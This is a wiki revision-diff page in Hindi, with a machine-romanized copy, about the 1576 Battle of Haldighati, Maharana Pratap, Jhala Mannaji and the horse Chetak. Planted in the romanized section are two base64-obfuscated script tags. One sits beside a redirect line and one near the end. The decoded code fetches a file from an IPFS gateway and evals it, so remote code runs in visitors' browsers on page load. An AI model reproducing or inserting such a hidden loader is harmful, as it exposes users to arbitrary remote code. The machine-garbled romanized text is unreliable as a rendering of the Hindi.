Difference between revisions of "हल्दीघाटी का युद्ध"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "श्रृंखला" to "शृंखला")
Line 19: Line 19:
 
==मुग़ल आक्रमण==
 
==मुग़ल आक्रमण==
 
उदयसिंह वर्ष 1541 ई. में [[मेवाड़]] के राणा हुए थे, जब कुछ ही दिनों के बाद अकबर ने मेवाड़ की राजधानी [[चित्तौड़]] पर चढ़ाई की। मुग़ल सेना ने आक्रमण कर चित्तौड़ को घेर लिया था, लेकिन [[राणा उदयसिंह]] ने अकबर अधीनता स्वीकार नहीं की। हज़ारों मेवाड़ियों की मृत्यु के बाद जब उन्हें लगा कि चित्तौड़गढ़ अब नहीं बचेगा, तब उदयसिंह ने चित्तौड़ को 'जयमल' और 'पत्ता' आदि वीरों के हाथ में छोड़ दिया और स्व्यं अरावली के घने जंगलों में चले गए। वहाँ उन्होंने नदी की बाढ़ रोक 'उदयसागर' नामक सरोवर का निर्माण किया था। वहीं उदयसिंह ने अपनी नई राजधानी [[उदयपुर]] बसाई। चित्तौड़ के विध्वंस के चार वर्ष बाद ही उदयसिंह का देहांत हो गया। उनके बाद [[महाराणा प्रताप]] ने भी युद्ध जारी रखा और [[मुग़ल]] अधीनता स्वीकार नहीं की।[[चित्र:Battlefield-Death-Of-Pratap-Singh-Chetak.jpg|thumb|left|युद्धभूमि पर [[महाराणा प्रताप]] के [[चेतक]] (घोड़े) की मौत]]
 
उदयसिंह वर्ष 1541 ई. में [[मेवाड़]] के राणा हुए थे, जब कुछ ही दिनों के बाद अकबर ने मेवाड़ की राजधानी [[चित्तौड़]] पर चढ़ाई की। मुग़ल सेना ने आक्रमण कर चित्तौड़ को घेर लिया था, लेकिन [[राणा उदयसिंह]] ने अकबर अधीनता स्वीकार नहीं की। हज़ारों मेवाड़ियों की मृत्यु के बाद जब उन्हें लगा कि चित्तौड़गढ़ अब नहीं बचेगा, तब उदयसिंह ने चित्तौड़ को 'जयमल' और 'पत्ता' आदि वीरों के हाथ में छोड़ दिया और स्व्यं अरावली के घने जंगलों में चले गए। वहाँ उन्होंने नदी की बाढ़ रोक 'उदयसागर' नामक सरोवर का निर्माण किया था। वहीं उदयसिंह ने अपनी नई राजधानी [[उदयपुर]] बसाई। चित्तौड़ के विध्वंस के चार वर्ष बाद ही उदयसिंह का देहांत हो गया। उनके बाद [[महाराणा प्रताप]] ने भी युद्ध जारी रखा और [[मुग़ल]] अधीनता स्वीकार नहीं की।[[चित्र:Battlefield-Death-Of-Pratap-Singh-Chetak.jpg|thumb|left|युद्धभूमि पर [[महाराणा प्रताप]] के [[चेतक]] (घोड़े) की मौत]]
==युद्ध==
+
 
 
'हल्दीघाटी का युद्ध' [[भारतीय इतिहास]] में प्रसिद्ध है। इस युद्ध के बाद महाराणा प्रताप की युद्ध-नीति छापामार लड़ाई की रही थी। [[अकबर]] ने [[मेवाड़]] को पूर्णरूप से जीतने के लिए [[18 जून]], 1576 ई. में [[आमेर]] के [[राजा मानसिंह]] एवं आसफ ख़ाँ के नेतृत्व में [[मुग़ल]] सेना को आक्रमण के लिए भेजा। दोनों सेनाओं के मध्य गोगुडा के निकट [[अरावली पर्वत शृंखला|अरावली पहाड़ी]] की हल्दीघाटी शाखा के मध्य युद्ध हुआ। इस युद्ध में राणा प्रताप पराजित हुए। लड़ाई के दौरान [[अकबर]] ने कुम्भलमेर दुर्ग से महाराणा प्रताप को खदेड़ दिया तथा मेवाड़ पर अनेक आक्रमण करवाये, किंतु प्रताप ने अधीनता स्वीकार नहीं की। युद्ध राणा प्रताप के पक्ष में निर्णायक नहीं हो सका। खुला युद्ध समाप्त हो गया था, किंतु संघर्ष समाप्त नहीं हुआ था। भविष्य में संघर्षो को अंजाम देने के लिए प्रताप एवं उसकी सेना युद्ध स्थल से हट कर पहाड़ी प्रदेश में आ गयी थी। मुग़लों के पास सैन्य शक्ति अधिक थी तो राणा प्रताप के पास जुझारू शक्ति अधिक थी।
 
'हल्दीघाटी का युद्ध' [[भारतीय इतिहास]] में प्रसिद्ध है। इस युद्ध के बाद महाराणा प्रताप की युद्ध-नीति छापामार लड़ाई की रही थी। [[अकबर]] ने [[मेवाड़]] को पूर्णरूप से जीतने के लिए [[18 जून]], 1576 ई. में [[आमेर]] के [[राजा मानसिंह]] एवं आसफ ख़ाँ के नेतृत्व में [[मुग़ल]] सेना को आक्रमण के लिए भेजा। दोनों सेनाओं के मध्य गोगुडा के निकट [[अरावली पर्वत शृंखला|अरावली पहाड़ी]] की हल्दीघाटी शाखा के मध्य युद्ध हुआ। इस युद्ध में राणा प्रताप पराजित हुए। लड़ाई के दौरान [[अकबर]] ने कुम्भलमेर दुर्ग से महाराणा प्रताप को खदेड़ दिया तथा मेवाड़ पर अनेक आक्रमण करवाये, किंतु प्रताप ने अधीनता स्वीकार नहीं की। युद्ध राणा प्रताप के पक्ष में निर्णायक नहीं हो सका। खुला युद्ध समाप्त हो गया था, किंतु संघर्ष समाप्त नहीं हुआ था। भविष्य में संघर्षो को अंजाम देने के लिए प्रताप एवं उसकी सेना युद्ध स्थल से हट कर पहाड़ी प्रदेश में आ गयी थी। मुग़लों के पास सैन्य शक्ति अधिक थी तो राणा प्रताप के पास जुझारू शक्ति अधिक थी।
==राजपूतों की वीरता==
+
==जहाँगीर से संघर्ष==
युद्ध में 'सलीम' (बाद में [[जहाँगीर]]) पर [[राणा प्रताप]] के आक्रमण को देखकर असंख्य [[मुग़ल]] सैनिक उसी तरफ़ बढ़े और प्रताप को घेरकर चारों तरफ़ से प्रहार करने लगे। प्रताप के सिर पर [[मेवाड़]] का राजमुकुट लगा हुआ था। इसलिए मुग़ल सैनिक उसी को निशाना बनाकर वार कर रहे थे। [[राजपूत]] सैनिक भी राणा को बचाने के लिए प्राण हथेली पर रखकर संघर्ष कर रहे थे। परन्तु धीरे-धीरे प्रताप संकट में फँसते ही चले जा रहे थे। स्थिति की गम्भीरता को परखकर झाला सरदार [[मन्नाजी]] ने स्वामिभक्ति का एक अपूर्व आदर्श प्रस्तुत करते हुए अपने प्राणों की बाजी लगा दी।
+
हल्दीघाटी के इस प्रवेश द्वार पर अपने चुने हुए सैनिकों के साथ राणा प्रताप शत्रु की प्रतीक्षा करने लगे। दोनों ओर की सेनाओं का सामना होते ही भीषण रूप से युद्ध शुरू हो गया और दोनों तरफ़ के शूरवीर योद्धा घायल होकर ज़मीन पर गिरने लगे। प्रताप अपने घोड़े पर सवार होकर द्रुतगति से शत्रु की सेना के भीतर पहुँच गये और राजपूतों के शत्रु मानसिंह को खोजने लगे। वह तो नहीं मिला, परन्तु प्रताप उस जगह पर पहुँच गये, जहाँ पर 'सलीम' ([[जहाँगीर]]) अपने [[हाथी]] पर बैठा हुआ था। प्रताप की तलवार से सलीम के कई अंगरक्षक मारे गए और यदि प्रताप के भाले और सलीम के बीच में लोहे की मोटी चादर वाला हौदा नहीं होता तो [[अकबर]] अपने उत्तराधिकारी से हाथ धो बैठता। प्रताप के घोड़े [[चेतक]] ने अपने स्वामी की इच्छा को भाँपकर पूरा प्रयास किया। तमाम ऐतिहासिक चित्रों में सलीम के हाथी की सूँड़ पर चेतक का एक उठा हुआ पैर और प्रताप के भाले द्वारा महावत की छाती का छलनी होना अंकित किया गया है।<ref>डॉक्टर गोपीनाथ शर्मा इस कथन को सही नहीं मानते। उनका कहना है कि प्रताप ने सलीम के हाथी पर नहीं अपितु मानसिंह के हाथी पर आक्रमण किया था। सलीम तो युद्धस्थल पर उपस्थित ही नहीं था।</ref> महावत के मारे जाने पर घायल हाथी सलीम सहित युद्ध भूमि से भाग खड़ा हुआ।
==मन्नाजी का बलिदान==
+
==राजपूतों का बलिदान==
 +
इस समय युद्ध अत्यन्त भयानक हो उठा था। सलीम पर राणा प्रताप के आक्रमण को देखकर असंख्य [[मुग़ल]] सैनिक उसी तरफ़ बढ़े और प्रताप को घेरकर चारों तरफ़ से प्रहार करने लगे। प्रताप के सिर पर [[मेवाड़]] का राजमुकुट लगा हुआ था। इसलिए [[मुग़ल]] सैनिक उन्हीं को निशाना बनाकर वार कर रहे थे। [[राजपूत]] सैनिक भी प्रताप को बचाने के लिए प्राण हथेली पर रखकर संघर्ष कर रहे थे। परन्तु धीरे-धीरे प्रताप संकट में फँसते जा रहे थे। स्थिति की गम्भीरता को परखकर [[झाला मान|झाला सरदार]] ने स्वामिभक्ति का एक अपूर्व आदर्श प्रस्तुत करते हुए अपने प्राणों का बलिदान कर दिया। झाला सरदार मन्नाजी तेज़ी के साथ आगे बढ़ा और प्रताप के सिर से मुकुट उतार कर अपने सिर पर रख लिया और तेज़ी के साथ कुछ दूरी पर जाकर घमासान युद्ध करने लगा। [[मुग़ल]] सैनिक उसे ही प्रताप समझकर उस पर टूट पड़े और प्रताप को युद्ध भूमि से दूर निकल जाने का अवसर मिल गया। उनका सारा शरीर अगणित घावों से लहूलुहान हो चुका था। युद्धभूमि से जाते-जाते प्रताप ने मन्नाजी को मरते देखा। राजपूतों ने बहादुरी के साथ मुग़लों का मुक़ाबला किया, परन्तु मैदानी तोपों तथा बन्दूकधारियों से सुसज्जित शत्रु की विशाल सेना के सामने समूचा पराक्रम निष्फल रहा। युद्धभूमि पर उपस्थित बाईस हज़ार राजपूत सैनिकों में से केवल आठ हज़ार जीवित सैनिक युद्धभूमि से किसी प्रकार बचकर निकल पाये।
 +
==पराक्रमी चेतक==
 +
[[चित्र:Rana-Pratap-and-Chetak.jpg|thumb|250px|राणा प्रताप और [[चेतक]]]]
 +
{{Main|चेतक}}
 +
महाराणा प्रताप का सबसे प्रिय घोड़ा [[चेतक]] था। [[हल्दीघाटी का युद्ध|हल्दीघाटी के युद्ध]] में घायल होने के बाद वे बिना किसी सहायक के अपने पराक्रमी चेतक पर सवार होकर पहाड़ की ओर चल पड़े। उनके पीछे दो [[मुग़ल]] सैनिक लगे हुए थे, परन्तु चेतक ने प्रताप को बचा लिया। रास्ते में एक पहाड़ी नाला बह रहा था। घायल चेतक फुर्ती से उसे लाँघ गया, परन्तु मुग़ल उसे पार न कर पाये। चेतक नाला तो लाँघ गया, पर अब उसकी गति धीरे-धीरे कम होती गई और पीछे से मुग़लों के घोड़ों की टापें भी सुनाई पड़ीं। उसी समय प्रताप को अपनी मातृभाषा में आवाज़ सुनाई पड़ी- "हो, नीला घोड़ा रा असवार।" प्रताप ने पीछे मुड़कर देखा तो उन्हें एक ही अश्वारोही दिखाई पड़ा और वह था, उनका भाई शक्तिसिंह। प्रताप के साथ व्यक्तिगत विरोध ने उसे देशद्रोही बनाकर [[अकबर]] का सेवक बना दिया था और युद्धस्थल पर वह मुग़ल पक्ष की तरफ़ से लड़ रहा था। जब उसने नीले घोड़े को बिना किसी सेवक के पहाड़ की तरफ़ जाते हुए देखा तो वह भी चुपचाप उसके पीछे चल पड़ा, परन्तु केवल दोनों मुग़लों को यमलोक पहुँचाने के लिए।
 +
==शक्तिसिंह द्वारा राणा प्रताप की सुरक्षा==
 
[[चित्र:Pratap-Singh-And-Chetak-Attacking-Man-Singh.jpg|thumb|[[मान सिंह]] पर हमला करते हुए [[महाराणा प्रताप]] और [[चेतक]]]]
 
[[चित्र:Pratap-Singh-And-Chetak-Attacking-Man-Singh.jpg|thumb|[[मान सिंह]] पर हमला करते हुए [[महाराणा प्रताप]] और [[चेतक]]]]
[[झाला मान|झाला सरदार मन्नाजी]] तेज़ी के साथ आगे बढ़ा और उसने राणा प्रताप के सिर से मुकुट उतार कर अपने सिर पर रख लिया। वह तेज़ी के साथ कुछ दूरी पर जाकर घमासान युद्ध करने लगा। [[मुग़ल]] सैनिक उसे ही प्रताप समझकर उस पर टूट पड़े। राणा प्रताप जो कि इस समय तक बहुत बुरी तरह घायल हो चुके थे, उन्हें युद्ध भूमि से दूर निकल जाने का अवसर मिल गया। उनका सारा शरीर अगणित घावों से लहूलुहान हो चुका था। युद्ध भूमि से जाते-जाते प्रताप ने मन्नाजी को मरते देखा। राजपूतों ने बहादुरी के साथ मुग़लों का मुक़ाबला किया, परन्तु मैदानी तोपों तथा बन्दूकधारियों से सुसज्जित शत्रु की विशाल सेना के सामने समूचा पराक्रम निष्फल रहा। युद्ध भूमि पर उपस्थित बाईस हज़ार [[राजपूत]] सैनिकों में से केवल आठ हज़ार जीवित सैनिक युद्ध भूमि से किसी प्रकार बचकर निकल पाये।
+
जीवन में पहली बार दोनों भाई प्रेम के साथ गले मिले। इस बीच चेतक ज़मीन पर गिर पड़ा और जब प्रताप उसकी काठी को खोलकर अपने भाई द्वारा प्रस्तुत घोड़े पर रख रहे थे, चेतक ने प्राण त्याग दिए। बाद में उस स्थान पर एक चबूतरा खड़ा किया गया, जो आज तक उस स्थान को इंगित करता है, जहाँ पर चेतक मरा था। प्रताप को विदा करके शक्तिसिंह खुरासानी सैनिक के घोड़े पर सवार होकर वापस लौट आया। सलीम को उस पर कुछ सन्देह पैदा हुआ। जब शक्तिसिंह ने कहा कि प्रताप ने न केवल पीछा करने वाले दोनों मुग़ल सैनिकों को मार डाला अपितु मेरा घोड़ा भी छीन लिया। इसलिए मुझे खुरासानी सैनिक के घोड़े पर सवार होकर आना पड़ा। सलीम ने वचन दिया कि अगर तुम सत्य बात कह दोगे तो मैं तुम्हें क्षमा कर दूँगा। तब शक्तिसिंह ने कहा, "मेरे भाई के कन्धों पर [[मेवाड़]] राज्य का बोझा है। इस संकट के समय उसकी सहायता किए बिना मैं कैसे रह सकता था।" सलीम ने अपना वचन निभाया, परन्तु शक्तिसिंह को अपनी सेवा से हटा दिया।
 +
 
 +
राणा प्रताप की सेवा में पहुँचकर उन्हें अच्छी नज़र भेंट की जा सके, इस ध्येय से उसने भिनसोर नामक दुर्ग पर आक्रमण कर उसे जीत लिया। [[उदयपुर]] पहुँचकर उस दुर्ग को भेंट में देते हुए शक्तिसिंह ने प्रताप का अभिवादन किया। प्रताप ने प्रसन्न होकर वह दुर्ग शक्तिसिंह को पुरस्कार में दे दिया। यह दुर्ग लम्बे समय तक उसके वंशजों के अधिकार में बना रहा।<ref>शक्तिसिंह की [[कथा]] भी अन्य प्रमाणों से सिद्ध नहीं होती। शक्तिसिंह पहले ही [[चित्तौड़]] के आक्रमण के समय काम आ चुका था। सम्भवतः दोनों भाइयों को मिलाने की कथा [[भाट|भाटों]] ने गढ़ ली है।</ref> [[संवत]] 1632 ([[जुलाई]], 1576 ई.) के [[सावन|सावन मास]] की [[सप्तमी]] का दिन [[मेवाड़ का इतिहास|मेवाड़ के इतिहास]] में सदा स्मरणीय रहेगा। उस दिन मेवाड़ के अच्छे रुधिर ने हल्दीघाटी को सींचा था। प्रताप के अत्यन्त निकटवर्ती पाँच सौ कुटुम्बी और सम्बन्धी, [[ग्वालियर]] का भूतपूर्व राजा रामशाह और साढ़े तीन सौ [[तोमर]] वीरों के साथ रामशाह का बेटा खाण्डेराव मारा गया। स्वामिभक्त झाला मन्नाजी अपने डेढ़ सौ सरदारों सहित मारा गया और मेवाड़ के प्रत्येक घर ने बलिदान किया।
 +
 
  
इस प्रकार [[हल्दीघाटी]] के इस भयंकर युद्ध में बड़ी सादड़ी के जुझारू झाला सरदार मान या मन्नाजी ने राणा की पाग (पगड़ी) लेकर उनका शीश बचाया। राणा अपने बहादुर सरदार का जुझारूपन कभी नहीं भूल सके। इसी युद्ध में राणा का प्राणप्रिय घोड़ा [[चेतक]] अपने स्वामी की रक्षा करते हुए शहीद हो गया और इसी युद्ध में उनका अपना बागी भाई शक्तिसिंह भी उनसे आ मिला और उनकी रक्षा में उसका भाई-प्रेम उजागर हो उठा था। अंत में सन 1542 के बाद अकबर का ध्यान दूसरे कामों में लगे रहने के कारण प्रताप ने अपने स्थानों पर फिर अधिकार कर लिया।
 
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक2 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक2 |माध्यमिक= |पूर्णता= |शोध= }}

Revision as of 12:58, 23 December 2016

haldighati ka yuddh
[[chitr:Haldighati-Udaipur.jpg|maharana pratap ki pratima, haldighati|200px|center]]
yuddh badashah akabar aur maharana pratap ke madhy
dinaank 18 joon, 1576 ee.
sthan haldighati (rajasthan)
parinam aisa mana jata hai ki is yuddh mean n to akabar jit saka aur n hi rana hare
sanbandhit lekh raja manasianh, jhala man, udayapur, chetak
any janakari 'haldighati ka yuddh' bharatiy itihas mean prasiddh hai. is yuddh ke bad maharana pratap ki yuddh-niti chhapamar l daee ki rahi thi.

haldighati ka yuddh mugal badashah akabar aur maharana pratap ke bich 18 joon, 1576 ee. ko l da gaya tha. akabar aur rana ke bich yah yuddh mahabharat yuddh ki tarah vinashakari siddh hua tha. aisa mana jata hai ki is yuddh mean n to akabar jit saka aur n hi rana hare. mugaloan ke pas sainy shakti adhik thi to rana pratap ke pas jujharoo shakti ki koee kami nahian thi. unhoanne akhiri samay tak akabar se sandhi ki bat svikar nahian ki aur man-samman ke sath jivan vyatit karate hue l daeeyaan l date rahe.

mugal akraman

udayasianh varsh 1541 ee. mean meva d ke rana hue the, jab kuchh hi dinoan ke bad akabar ne meva d ki rajadhani chittau d par chadhaee ki. mugal sena ne akraman kar chittau d ko gher liya tha, lekin rana udayasianh ne akabar adhinata svikar nahian ki. hazaroan meva diyoan ki mrityu ke bad jab unhean laga ki chittau dagadh ab nahian bachega, tab udayasianh ne chittau d ko 'jayamal' aur 'patta' adi viroan ke hath mean chho d diya aur svyan aravali ke ghane jangaloan mean chale ge. vahaan unhoanne nadi ki badh rok 'udayasagar' namak sarovar ka nirman kiya tha. vahian udayasianh ne apani nee rajadhani udayapur basaee. chittau d ke vidhvans ke char varsh bad hi udayasianh ka dehaant ho gaya. unake bad maharana pratap ne bhi yuddh jari rakha aur mugal adhinata svikar nahian ki.[[chitr:Battlefield-Death-Of-Pratap-Singh-Chetak.jpg|thumb|left|yuddhabhoomi par maharana pratap ke chetak (gho de) ki maut]]

'haldighati ka yuddh' bharatiy itihas mean prasiddh hai. is yuddh ke bad maharana pratap ki yuddh-niti chhapamar l daee ki rahi thi. akabar ne meva d ko poornaroop se jitane ke lie 18 joon, 1576 ee. mean amer ke raja manasianh evan asaph khaan ke netritv mean mugal sena ko akraman ke lie bheja. donoan senaoan ke madhy goguda ke nikat aravali paha di ki haldighati shakha ke madhy yuddh hua. is yuddh mean rana pratap parajit hue. l daee ke dauran akabar ne kumbhalamer durg se maharana pratap ko khade d diya tatha meva d par anek akraman karavaye, kiantu pratap ne adhinata svikar nahian ki. yuddh rana pratap ke paksh mean nirnayak nahian ho saka. khula yuddh samapt ho gaya tha, kiantu sangharsh samapt nahian hua tha. bhavishy mean sangharsho ko aanjam dene ke lie pratap evan usaki sena yuddh sthal se hat kar paha di pradesh mean a gayi thi. mugaloan ke pas sainy shakti adhik thi to rana pratap ke pas jujharoo shakti adhik thi.

jahaangir se sangharsh

haldighati ke is pravesh dvar par apane chune hue sainikoan ke sath rana pratap shatru ki pratiksha karane lage. donoan or ki senaoan ka samana hote hi bhishan roop se yuddh shuroo ho gaya aur donoan taraf ke shooravir yoddha ghayal hokar zamin par girane lage. pratap apane gho de par savar hokar drutagati se shatru ki sena ke bhitar pahuanch gaye aur rajapootoan ke shatru manasianh ko khojane lage. vah to nahian mila, parantu pratap us jagah par pahuanch gaye, jahaan par 'salim' (jahaangir) apane hathi par baitha hua tha. pratap ki talavar se salim ke kee aangarakshak mare ge aur yadi pratap ke bhale aur salim ke bich mean lohe ki moti chadar vala hauda nahian hota to akabar apane uttaradhikari se hath dho baithata. pratap ke gho de chetak ne apane svami ki ichchha ko bhaanpakar poora prayas kiya. tamam aitihasik chitroan mean salim ke hathi ki sooan d par chetak ka ek utha hua pair aur pratap ke bhale dvara mahavat ki chhati ka chhalani hona aankit kiya gaya hai.[1] mahavat ke mare jane par ghayal hathi salim sahit yuddh bhoomi se bhag kh da hua.

rajapootoan ka balidan

is samay yuddh atyant bhayanak ho utha tha. salim par rana pratap ke akraman ko dekhakar asankhy mugal sainik usi taraf badhe aur pratap ko gherakar charoan taraf se prahar karane lage. pratap ke sir par meva d ka rajamukut laga hua tha. isalie mugal sainik unhian ko nishana banakar var kar rahe the. rajapoot sainik bhi pratap ko bachane ke lie pran hatheli par rakhakar sangharsh kar rahe the. parantu dhire-dhire pratap sankat mean phansate ja rahe the. sthiti ki gambhirata ko parakhakar jhala saradar ne svamibhakti ka ek apoorv adarsh prastut karate hue apane pranoan ka balidan kar diya. jhala saradar mannaji tezi ke sath age badha aur pratap ke sir se mukut utar kar apane sir par rakh liya aur tezi ke sath kuchh doori par jakar ghamasan yuddh karane laga. mugal sainik use hi pratap samajhakar us par toot p de aur pratap ko yuddh bhoomi se door nikal jane ka avasar mil gaya. unaka sara sharir aganit ghavoan se lahooluhan ho chuka tha. yuddhabhoomi se jate-jate pratap ne mannaji ko marate dekha. rajapootoan ne bahaduri ke sath mugaloan ka muqabala kiya, parantu maidani topoan tatha bandookadhariyoan se susajjit shatru ki vishal sena ke samane samoocha parakram nishphal raha. yuddhabhoomi par upasthit baees hazar rajapoot sainikoan mean se keval ath hazar jivit sainik yuddhabhoomi se kisi prakar bachakar nikal paye.

parakrami chetak

[[chitr:Rana-Pratap-and-Chetak.jpg|thumb|250px|rana pratap aur chetak]]

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

maharana pratap ka sabase priy gho da chetak tha. haldighati ke yuddh mean ghayal hone ke bad ve bina kisi sahayak ke apane parakrami chetak par savar hokar paha d ki or chal p de. unake pichhe do mugal sainik lage hue the, parantu chetak ne pratap ko bacha liya. raste mean ek paha di nala bah raha tha. ghayal chetak phurti se use laangh gaya, parantu mugal use par n kar paye. chetak nala to laangh gaya, par ab usaki gati dhire-dhire kam hoti gee aur pichhe se mugaloan ke gho doan ki tapean bhi sunaee p dian. usi samay pratap ko apani matribhasha mean avaz sunaee p di- "ho, nila gho da ra asavar." pratap ne pichhe mu dakar dekha to unhean ek hi ashvarohi dikhaee p da aur vah tha, unaka bhaee shaktisianh. pratap ke sath vyaktigat virodh ne use deshadrohi banakar akabar ka sevak bana diya tha aur yuddhasthal par vah mugal paksh ki taraf se l d raha tha. jab usane nile gho de ko bina kisi sevak ke paha d ki taraf jate hue dekha to vah bhi chupachap usake pichhe chal p da, parantu keval donoan mugaloan ko yamalok pahuanchane ke lie.

shaktisianh dvara rana pratap ki suraksha

[[chitr:Pratap-Singh-And-Chetak-Attacking-Man-Singh.jpg|thumb|man sianh par hamala karate hue maharana pratap aur chetak]] jivan mean pahali bar donoan bhaee prem ke sath gale mile. is bich chetak zamin par gir p da aur jab pratap usaki kathi ko kholakar apane bhaee dvara prastut gho de par rakh rahe the, chetak ne pran tyag die. bad mean us sthan par ek chabootara kh da kiya gaya, jo aj tak us sthan ko iangit karata hai, jahaan par chetak mara tha. pratap ko vida karake shaktisianh khurasani sainik ke gho de par savar hokar vapas laut aya. salim ko us par kuchh sandeh paida hua. jab shaktisianh ne kaha ki pratap ne n keval pichha karane vale donoan mugal sainikoan ko mar dala apitu mera gho da bhi chhin liya. isalie mujhe khurasani sainik ke gho de par savar hokar ana p da. salim ne vachan diya ki agar tum saty bat kah doge to maian tumhean kshama kar dooanga. tab shaktisianh ne kaha, "mere bhaee ke kandhoan par meva d rajy ka bojha hai. is sankat ke samay usaki sahayata kie bina maian kaise rah sakata tha." salim ne apana vachan nibhaya, parantu shaktisianh ko apani seva se hata diya.

rana pratap ki seva mean pahuanchakar unhean achchhi nazar bheant ki ja sake, is dhyey se usane bhinasor namak durg par akraman kar use jit liya. udayapur pahuanchakar us durg ko bheant mean dete hue shaktisianh ne pratap ka abhivadan kiya. pratap ne prasann hokar vah durg shaktisianh ko puraskar mean de diya. yah durg lambe samay tak usake vanshajoan ke adhikar mean bana raha.[2] sanvat 1632 (julaee, 1576 ee.) ke savan mas ki saptami ka din meva d ke itihas mean sada smaraniy rahega. us din meva d ke achchhe rudhir ne haldighati ko siancha tha. pratap ke atyant nikatavarti paanch sau kutumbi aur sambandhi, gvaliyar ka bhootapoorv raja ramashah aur sadhe tin sau tomar viroan ke sath ramashah ka beta khanderav mara gaya. svamibhakt jhala mannaji apane dedh sau saradaroan sahit mara gaya aur meva d ke pratyek ghar ne balidan kiya.



panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. d aauktar gopinath sharma is kathan ko sahi nahian manate. unaka kahana hai ki pratap ne salim ke hathi par nahian apitu manasianh ke hathi par akraman kiya tha. salim to yuddhasthal par upasthit hi nahian tha.
  2. shaktisianh ki katha bhi any pramanoan se siddh nahian hoti. shaktisianh pahale hi chittau d ke akraman ke samay kam a chuka tha. sambhavatah donoan bhaiyoan ko milane ki katha bhatoan ne gadh li hai.

bahari k diyaan

sanbandhit lekh